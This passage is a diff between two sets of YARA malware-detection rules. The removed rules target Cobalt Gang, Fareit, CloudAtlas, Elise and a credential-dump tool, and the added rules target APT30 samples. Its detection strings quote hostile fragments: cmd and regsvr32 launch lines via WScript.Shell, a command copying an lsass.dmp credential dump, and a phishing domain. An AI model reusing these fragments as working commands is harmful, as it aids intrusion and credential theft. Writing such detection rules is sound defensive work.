+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = { 2F 70 72 69 76 61 74 65 2F 76 61 72 00 68 77 2E
-               70 68 79 73 6D 65 6D 00 68 77 2E 75 73 65 72 6D
-               65 6D 00 4E 41 2D 4E 41 2D 4E 41 2D 4E 41 2D 4E
-               41 2D 4E 41 00 6C 6F 30 00 00 00 00 25 30 32 78
-               2D 25 30 32 78 2D 25 30 32 78 2D 25 30 32 78 2D
-               25 30 32 78 2D 25 30 32 78 0A 00 72 00 4E 41 00
-               75 6E 61 6D 65 20 2D 76 }
-		$s1 = "badshell" ascii fullword
-		$s2 = "hw.physmem" ascii fullword
-		$s3 = "uname -v" ascii fullword
-		$s4 = "uname -s" ascii fullword
-		$s5 = "machdep.tsc_freq" ascii fullword
-		$s6 = "/usr/sbin/config.bak" ascii fullword
-		$s7 = "enter MessageLoop..." ascii fullword
-		$s8 = "exit StartCBProcess..." ascii fullword
-		$sc1 = { 72 6D 20 2D 72 66 20 22 25 73 22 00 2F 70 72 6F
-               63 2F }
+		$gen1 = "void Page_Load" ascii
+		$gen2 = "FromBase64String" ascii
+		$gen3 = "CryptoServiceProvider" ascii
+		$gen4 = "ComputeHash" ascii
+		$hashing1 = "BitConverter.ToString(" ascii
+		$hashing2 = ").Replace(\"-\", \"\") == \"" ascii
+		$filter1 = "BitConverter.ToString((" ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 600KB and 1 of ( $x* ) or 4 of them
+		filesize < 10KB and all of ( $gen* ) and all of ( $hashing* ) and not 1 of ( $filter* )
 }
-rule SIGNATURE_BASE_Fareit_Trojan_Oct15 : FILE
+rule SIGNATURE_BASE_APT30_Generic_H : FILE
 {
 	meta:
-		description = "Detects Fareit Trojan from Sep/Oct 2015 Wave"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "725abb2a-7675-51b5-aed8-594e4826a6b4"
-		date = "2015-10-18"
+		id = "1908e985-9634-51dc-8972-53afa13c26a3"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/5VYtlU"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fareit.yar#L8-L30"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L10-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ef47e81483d5edf67d489a9a35ce56667e293350534e780d7d93b1fbc5f7113a"
-		score = 80
+		logic_hash = "e4affe7dc01efc4d6c25aaae4679bc1f8fddd97794e351d30501eaeb8e1d1dea"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "230ca0beba8ae712cfe578d2b8ec9581ce149a62486bef209b04eb11d8c088c3"
-		hash2 = "3477d6bfd8313d37fedbd3d6ba74681dd7cb59040cabc2991655bdce95a2a997"
-		hash3 = "408fa0bd4d44de2940605986b554e8dab42f5d28a6a525b4bc41285e37ab488d"
-		hash4 = "76669cbe6a6aac4aa52dbe9d2e027ba184bf3f0b425f478e8c049637624b5dae"
-		hash5 = "9486b73eac92497e703615479d52c85cfb772b4ca6c846ef317729910e7c545f"
-		hash6 = "c3300c648aebac7bf1d90f58ea75660c78604410ca0fa705d3b8ec1e0a45cdd9"
-		hash7 = "ff83e9fcfdec4ffc748e0095391f84a8064ac958a274b9684a771058c04cb0fa"
+		hash1 = "2a4c8752f3e7fde0139421b8d5713b29c720685d"
+		hash2 = "4350e906d590dca5fcc90ed3215467524e0a4e3d"
 
 	strings:
-		$s1 = "ebai.exe" fullword wide
-		$s2 = "Origina" fullword wide
+		$s0 = "\\Temp1020.txt" ascii
+		$s1 = "Xmd.Txe" fullword ascii
+		$s2 = "\\Internet Exp1orer" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $s1 in ( 0 .. 30000 ) and $s2 in ( 0 .. 30000 )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Cobaltstrike_CN_Group_Beacondropper_Aug17 : FILE
+rule SIGNATURE_BASE_APT30_Sample_2 : FILE
 {
 	meta:
-		description = "Detects Script Dropper of Cobalt Gang used in August 2017"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5631b0bc-9e25-524a-9003-73779fd492f7"
-		date = "2017-08-09"
+		id = "821a2de9-48c4-58d8-acc4-1e25025ab5cf"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cobaltgang.yar#L15-L39"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L28-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "89db9c5f09afc9cb54fb7a9cd1490373c568ac4dc04bdb9ef71136f91e16ad2c"
+		hash = "0359ffbef6a752ee1a54447b26e272f4a5a35167"
+		logic_hash = "e34dbb90fc868b0619d3d2aa1b6176252836a6ae72e6f52b1eba632054f7c272"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fc0fad39b461eb1cfc6be57932993fcea94fca650564271d1b74dd850c81602f"
-		hash2 = "1c845bb0f6b9a96404af97dcafdc77f1629246e840c01dd9f1580a341f554926"
-		hash3 = "6206e372870ea4f363be53557477f9748f1896831a0cdef3b8450a7fb65b86e1"
 
 	strings:
-		$x1 = "WriteLine(\"(new ActiveXObject('WScript.Shell')).Run('cmd /c c:/" ascii
-		$x2 = "WriteLine(\" (new ActiveXObject('WScript.Shell')).Run('regsvr32 /s" ascii
-		$x3 = "sh.Run(env('cmd /c set > %temp%" ascii
-		$x4 = "sh.Run('regsvr32 /s /u /i:" ascii
-		$x5 = ".Get('Win32_ScheduledJob').Create('regsvr32 /s /u /i:" ascii
-		$x6 = "scrobj.dll','********" ascii
-		$x7 = "www.thyssenkrupp-marinesystems.org" fullword ascii
-		$x8 = "f.WriteLine(\" tLnk=env('%tmp%/'+lnkName+'.lnk');\");" fullword ascii
-		$x9 = "lnkName='office 365'; " fullword ascii
-		$x10 = ";sh=x('WScript.Shell');" ascii
+		$s0 = "ForZRLnkWordDlg.EXE" fullword wide
+		$s1 = "ForZRLnkWordDlg Microsoft " fullword wide
+		$s9 = "ForZRLnkWordDlg 1.0 " fullword wide
+		$s11 = "ForZRLnkWordDlg" fullword wide
+		$s12 = " (C) 2011" fullword wide
 
 	condition:
-		( filesize < 200KB and 1 of them )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Cobaltgang_Malware_Aug17_1 : FILE
+rule SIGNATURE_BASE_APT30_Sample_3 : FILE
 {
 	meta:
-		description = "Detects a Cobalt Gang malware"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "56c6f4f8-ccf5-5665-ac21-67f0a9b67cf1"
-		date = "2017-08-09"
+		id = "62e81385-26f5-545d-92ff-6604ff4d0186"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://sslbl.abuse.ch/intel/6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cobaltgang.yar#L41-L57"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L47-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "46077106bd19dd38a714a220b887742f5a29424ac8eb89f469975f863b3782ec"
+		hash = "d0320144e65c9af0052f8dee0419e8deed91b61b"
+		logic_hash = "ee61ec1fdf27fa21bcc235fce0ab8dc74968b39a747648ce828fb4826cf1d234"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6d70673b723f338b3febc9f1d69463bdd4775539cb92b5a5d8fccc0d977fa2f0"
 
 	strings:
-		$s1 = "ServerSocket.EXE" fullword wide
-		$s2 = "Incorrect version of WS2_32.dll found" fullword ascii
-		$s3 = "Click 'Connect' to Connect to the Server.  'Disconnect' to disconnect from server." fullword wide
-		$s4 = "Click 'Start' to start the Server.  'Stop' to Stop it." fullword wide
+		$s5 = "Software\\Mic" ascii
+		$s6 = "HHOSTR" ascii
+		$s9 = "ThEugh" fullword ascii
+		$s10 = "Moziea/" ascii
+		$s12 = "%s%s(X-" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Cobaltgang_Malware_Aug17_2 : FILE
+rule SIGNATURE_BASE_APT30_Generic_C : FILE
 {
 	meta:
-		description = "Detects a Cobalt Gang malware"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2839c119-0fa4-51f0-a406-5d381cc594a2"
-		date = "2017-08-09"
+		id = "25ec8d54-9875-5bf5-abc9-296f18f3c5e5"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://sslbl.abuse.ch/intel/6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cobaltgang.yar#L59-L72"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L66-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "54095d2f447b6478aefe956133fb9b97171c1e07d7d9186a70bf242a094e4156"
+		logic_hash = "b969565eac3b6f548318aae4edc8d8851f522a6c263bcaf2a466ff0ca9af78a4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "80791d5e76782cc3cd14f37f351e33b860818784192ab5b650f1cdf4f131cf72"
+		hash1 = "8667f635fe089c5e2c666b3fe22eaf3ff8590a69"
+		hash2 = "0c4fcef3b583d0ffffc2b14b9297d3a4"
+		hash3 = "37aee58655f5859e60ece6b249107b87"
+		hash4 = "4154548e1f8e9e7eb39d48a4cd75bcd1"
+		hash5 = "a2e0203e665976a13cdffb4416917250"
+		hash6 = "b4ae0004094b37a40978ef06f311a75e"
+		hash7 = "e39756bc99ee1b05e5ee92a1cdd5faf4"
 
 	strings:
-		$s1 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENGB)" fullword ascii
+		$s0 = "MYUSER32.dll" fullword ascii
+		$s1 = "MYADVAPI32.dll" fullword ascii
+		$s2 = "MYWSOCK32.dll" fullword ascii
+		$s3 = "MYMSVCRT.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule SIGNATURE_BASE_MAL_CRIME_Cobaltgang_Malware_Oct19_1 : FILE
+rule SIGNATURE_BASE_APT30_Sample_4 : FILE
 {
 	meta:
-		description = "Detects CobaltGang malware"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "95c16016-b09b-56f3-b5a4-fca18ac70ad5"
-		date = "2019-10-24"
+		id = "e5c6afde-0ab5-54ed-8d18-5ad477a527d7"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/vxsh4d0w/status/1187353649015611392"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cobaltgang.yar#L74-L95"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L90-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4bd57aa6929b3eced7dee8063d89c542f2c80f802ef40efc23bbea6cc8ffd98c"
+		hash = "75367d8b506031df5923c2d8d7f1b9f643a123cd"
+		logic_hash = "ec9542acb583bd5812d561bea70e89e0fcddc1eaef14d3ea5b8ad29711ed17ae"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "72125933265f884ceb8ab64ab303ea76aaeb7877faee8976d398acd0d0b7356b"
-		hash2 = "893339624602c7b3a6f481aed9509b53e4e995d6771c72d726ba5a6b319608a7"
-		hash3 = "3c34bbf641df25f9accd05b27b9058e25554fdfea0e879f5ca21ffa460ad2b01"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$op_a1 = { 0f 44 c2 eb 0a 31 c0 80 fa 20 0f 94 c0 01 c0 5d }
-		$op_b1 = { 89 e5 53 8b 55 08 8b 4d 0c 8a 1c 01 88 1c 02 83 }
-		$op_b2 = { 89 e5 53 8b 55 08 8b 45 0c 8a 1c 0a 88 1c 08 83 }
+		$s0 = "GetStartupIn" ascii
+		$s1 = "enMutex" ascii
+		$s2 = "tpsvimi" ascii
+		$s3 = "reateProcesy" ascii
+		$s5 = "FreeLibr1y*S" ascii
+		$s6 = "foAModuleHand" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and ( pe.imphash ( ) == "d1e3f8d02cce09520379e5c1e72f862f" or pe.imphash ( ) == "8e26df99c70f79cb8b1ea2ef6f8e52ac" or ( $op_a1 and 1 of ( $op_b* ) ) )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule SIGNATURE_BASE_SUSP_THOR_Unsigned_Oct23_1 : FILE
+rule SIGNATURE_BASE_APT30_Sample_5 : FILE
 {
 	meta:
-		description = "Detects unsigned version of THOR scanner, which could be a backdoored / modified version of the scanner"
-		author = "Florian Roth"
-		id = "2ca6a192-675e-5f02-a7b1-40369eeb9904"
-		date = "2023-10-28"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bdbebe44-7423-5793-8a42-4f9b70de2231"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_unsigned_thor.yar#L4-L22"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L110-L127"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "12303e3549071dd6c8896f7a1222eb5905f6b4d3f320134416a5b6d53857adeb"
+		hash = "1a2dd2a0555dc746333e7c956c58f7c4cdbabd4b"
+		logic_hash = "3738076d97bf19404bad20c2419eae83dd2b65400d5bd135ffe73362c008de9b"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "THOR APT Scanner" wide fullword
-		$s2 = "Nextron Systems GmbH" wide fullword
-		$sc1 = { 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 74 00 68 00 6F 00 72 }
+		$s0 = "Version 4.7.3001" fullword wide
+		$s1 = "Copyright (c) Microsoft Corporation 2004" fullword wide
+		$s3 = "Microsoft(R) is a registered trademark of Microsoft Corporation in the U" wide
+		$s7 = "msmsgs" fullword wide
+		$s10 = "----------------g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them and pe.number_of_signatures == 0
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Reveal_Memorycredentials : FILE
+rule SIGNATURE_BASE_APT30_Sample_6 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file Reveal-MemoryCredentials.ps1"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ca06c702-45fe-5ab5-b53e-c3f7b7006570"
-		date = "2015-08-31"
+		id = "2f19809c-09fc-51bf-9a20-6b95099a92dd"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/giMini/RWMC/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rwmc_powershell_creddump.yar#L8-L24"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L129-L143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "893c26818c424d0ff549c1fbfa11429f36eecd16ee69330c442c59a82ce6adea"
-		logic_hash = "d740462aacd3b30d0258d018344642683fefd43ef033dd7f5bdde2bdddce4115"
+		hash = "00e69b059ad6b51b76bc476a115325449d10b4c0"
+		logic_hash = "139719139056f575967629f0153e0a05239bc26f61f6d4324cfb6a816518c3df"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$dumpAProcessPath = \"C:\\Windows\\temp\\msdsc.exe\"" fullword ascii
-		$s2 = "$user = Get-ADUser -Filter {UserPrincipalName -like $loginPlainText -or sAMAccountName -like $loginPlainText}" fullword ascii
-		$s3 = "Copy-Item -Path \"\\\\$computername\\\\c$\\windows\\temp\\lsass.dmp\" -Destination \"$logDirectoryPath\"" fullword ascii
-		$s4 = "if($backupOperatorsFlag -eq \"true\") {$loginPlainText = $loginPlainText + \" = Backup Operators\"}            " fullword ascii
+		$s0 = "GreateProcessA" fullword ascii
+		$s1 = "Ternel32.dll" fullword ascii
 
 	condition:
-		filesize < 200KB and 1 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Minidumptest_Msdsc : FILE
+rule SIGNATURE_BASE_APT30_Sample_7 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file msdsc.exe"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "044ae157-aba2-5935-9afc-8a12853c84bc"
-		date = "2015-08-31"
+		id = "612732d9-8df5-5388-b299-2da4f8118435"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/giMini/RWMC/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rwmc_powershell_creddump.yar#L26-L42"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L145-L163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "477034933918c433f521ba63d2df6a27cc40a5833a78497c11fb0994d2fd46ba"
-		logic_hash = "ae8a28df245a8f7a2d62639789c31556b012322fcac09784595fd6f95d6bf195"
-		score = 50
+		hash = "868d1f4c106a08bd2e5af4f23139f0e0cd798fba"
+		logic_hash = "f7922d795bc92714a9ef4861bc9c4ac9921a73749e3aa1d5f7dbc3c991fe7145"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "MiniDumpTest1.exe" fullword wide
-		$s2 = "MiniDumpWithTokenInformation" fullword ascii
-		$s3 = "MiniDumpTest1" fullword wide
-		$s6 = "Microsoft 2008" fullword ascii
+		$s0 = "datain" fullword ascii
+		$s3 = "C:\\Prog" ascii
+		$s4 = "$LDDATA$" ascii
+		$s5 = "Maybe a Encrypted Flash" fullword ascii
+		$s6 = "Jean-loup Gailly" ascii
+		$s8 = "deflate 1.1.3 Copyright" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Maldoc_Cloudatlas_Oct20_1 : FILE
+rule SIGNATURE_BASE_APT30_Generic_E : FILE
 {
 	meta:
-		description = "Detects unknown maldoc dropper noticed in October 2020"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e7caf2b2-caf2-5984-a792-8224f2641bda"
-		date = "2020-10-13"
+		id = "69e76a59-3529-541d-9017-07e6d67fbda4"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/jfslowik/status/1316050637092651009"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cloudatlas.yar#L2-L16"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L165-L183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "772bdd8ec89edf2054e675e9ecb321a7bfe0307a7086a4e5b65f8d8b8cf80ecc"
+		logic_hash = "5ccf1f1334dc300d13aa8dbc080d2d839815d102958fde2b8709c11f522412fd"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "7ba76b2311736dbcd4f2817c40dae78f223366f2404571cd16d6676c7a640d70"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1dbb584e19499e26398fb0a7aa2a01b7"
+		hash2 = "572c9cd4388699347c0b2edb7c6f5e25"
+		hash3 = "8ff473bedbcc77df2c49a91167b1abeb"
+		hash4 = "a813eba27b2166620bd75029cc1f04b0"
+		hash5 = "b5546842e08950bc17a438d785b5a019"
 
 	strings:
-		$x1 = "https://msofficeupdate.org" wide
+		$s0 = "Nkfvtyvn}" ascii
+		$s6 = "----------------g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 300KB and 1 of ( $x* )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_URL_Cloudatlas_Oct20_2 : FILE
+rule SIGNATURE_BASE_APT30_Sample_8 : FILE
 {
 	meta:
-		description = "Detects unknown maldoc dropper noticed in October 2020 - file morgue6visible5bunny6culvert7ambo5nun1illuminate4.url"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "91f6362f-1793-58a3-a750-04ec9812b9df"
-		date = "2020-10-13"
+		id = "5053c2db-32a9-58ae-9a72-eb16ef14168e"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/jfslowik/status/1316050637092651009"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cloudatlas.yar#L18-L37"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L185-L201"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8bb60c262a34babbe8839f5d39d1c972eeb41ea77eaae02cc877d908c7033f13"
+		hash = "9531e21652143b8b129ab8c023dc05fef2a17cc3"
+		logic_hash = "bff21d517e97d2b13dff2b5ebc9a5b82b8f7635943c89f992b41d269623cd498"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "a6a58b614a9f5ffa1d90b5d42e15521f52e2295f02c1c0e5cd9cbfe933303bee"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$hc1 = { 5B 49 6E 74 65 72 6E 65 74 53 68 6F 72 74 63 75
-               74 5D 0D 0A 55 52 4C 3D 68 74 74 70 73 3A 2F 2F
-               6D 73 6F 66 66 69 63 65 75 70 64 61 74 65 2E 6F
-               72 67 }
+		$s0 = "ateProcessA" ascii
+		$s1 = "Ternel32.dllFQ" fullword ascii
+		$s2 = "StartupInfoAModuleHand" fullword ascii
+		$s3 = "OpenMutex" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x495b and filesize < 200 and $hc1 at 0
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule SIGNATURE_BASE_Elise_Jan18_1 : FILE
+rule SIGNATURE_BASE_APT30_Generic_B : FILE
 {
 	meta:
-		description = "Detects Elise malware samples - fake Norton Security NavShExt.dll"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8e4f4ec8-5d31-5990-8c14-861423571a79"
-		date = "2018-01-24"
+		id = "df3b8896-7229-5b3b-ad2f-774b0cea167c"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/blu3_team/status/955971742329135105"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lotusblossom_elise.yar#L13-L32"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L203-L222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d43486db0d4263f91924da89f1922ad965ed91eadd07ae0705eecd371f31fa44"
+		logic_hash = "527c823607836f138369224b7d8d492d36d9ab7a150e64fd5ebbaf99538d6d53"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6dc2a49d58dc568944fef8285ad7a03b772b9bdf1fe4bddff3f1ade3862eae79"
+		hash1 = "0fcb4ffe2eb391421ec876286c9ddb6c"
+		hash2 = "29395c528693b69233c1c12bef8a64b3"
+		hash3 = "4c6b21e98ca03e0ef0910e07cef45dac"
+		hash4 = "550459b31d8dabaad1923565b7e50242"
+		hash5 = "65232a8d555d7c4f7bc0d7c5da08c593"
+		hash6 = "853a20f5fc6d16202828df132c41a061"
+		hash7 = "ed151602dea80f39173c2f7b1dd58e06"
 
 	strings:
-		$s1 = "NavShExt.dll" fullword wide
-		$s2 = "Norton Security" fullword wide
-		$a1 = "donotbotherme" fullword ascii
+		$s2 = "Moziea/4.0" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and ( pe.imphash ( ) == "e9478ee4ebf085d1f14f64ba96ef082f" or ( 1 of ( $s* ) and $a1 ) )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Trojandownloader : FILE
+rule SIGNATURE_BASE_APT30_Generic_I : FILE
 {
 	meta:
-		description = "Trojan Downloader - Flash Exploit Feb15"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d61f59ef-31a3-5e52-9525-61910bb150db"
-		date = "2015-02-11"
+		id = "55046e1a-731a-5418-9a7a-4fe1611c77d0"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/wJ8V1I"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_generic.yar#L4-L41"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L224-L240"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5b8d4280ff6fc9c8e1b9593cbaeb04a29e64a81e"
-		logic_hash = "4911098beea1d348d41d6a38c03b343bb7b8a8090ba664fd4b0747045127c686"
-		score = 60
-		quality = 83
